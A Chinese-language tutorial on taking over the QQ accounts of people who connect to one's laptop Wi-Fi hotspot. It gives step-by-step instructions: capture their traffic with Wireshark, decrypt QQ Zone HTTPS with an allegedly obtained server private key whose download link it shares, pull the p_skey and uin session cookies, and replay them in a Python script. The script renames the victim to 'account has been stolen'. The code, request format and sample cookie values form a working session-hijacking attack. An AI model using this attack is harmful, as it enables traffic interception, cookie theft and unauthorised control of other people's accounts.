#本文内容仅供个人娱乐学习
思路:
使用wireshark监听笔记本的wifi热点,拦截捕获连接你的wifi热点的人的手机qq网络数据包,从网络数据包中分析取出两个qq空间的两个coookie值,使用cookie值修改掉连接你的wifi的人的qq昵称,从而制造账号被盗的假象。
实现:
所需工具:wireshark数据包分析系统,能启用wifi热点的笔记本,一门可以输出http请求的编程语言。
一、启用wifi热点
二、确定wifi热点的接口名称
三、打开wireshark监听这个网络接口
四、用手机连接这个wifi热点,然后打开手机qq浏览一下动态(qq空间)
五、解密wireshark捕获的数据包
未解密的数据流:
qq空间使用了https协议,wireshark无法自动解密https数据流,我们给wireshark提供一个qq空间的服务器证书私钥就可以解密qq空间的数据流了。
这里我已经拿到了qq空间的私钥,qzone.key下载地址:https://pan.baidu.com/s/1HeF9wLMOTVXA8kqWv6ZurQ
配置方法请见:http://www.cnblogs.com/aucy/p/9082429.html
解密后的数据流:
六、解密后在wireshark输入筛选规则“http.cookie”,找到“p_skey”与对应的“uin”这俩cookie值
七、修改目标qq昵称
数据包配置:
url:https://mobile.qzone.qq.com/profile_mod
cookie:p_uin=<uin值> p_skey=<p_skey值>
data:format=json&nickname=<想要改的昵称>&birthyear=2018&birthmonth=1&birthday=1
我这里使用python发送数据包:
from urllib import request def HTTP_POST(url,data,headers): req=request.Request(url,bytes(data,"utf-8"),headers) res=request.urlopen(req) print(res.read()) def ModNick(nick,cookies): url="https://mobile.qzone.qq.com/profile_mod" data="format=json&nickname="+nick+"&birthyear=2018&birthmonth=1&birthday=1" headers={ "cookie":cookies } HTTP_POST(url,data,headers) if __name__ == '__main__': ModNick("账号已被盗","p_uin=o2221234077; p_skey=W7IF8j7lBIh3UeRdQq1wKS9ToHAKuJnKsjXgzOQmK5w_;")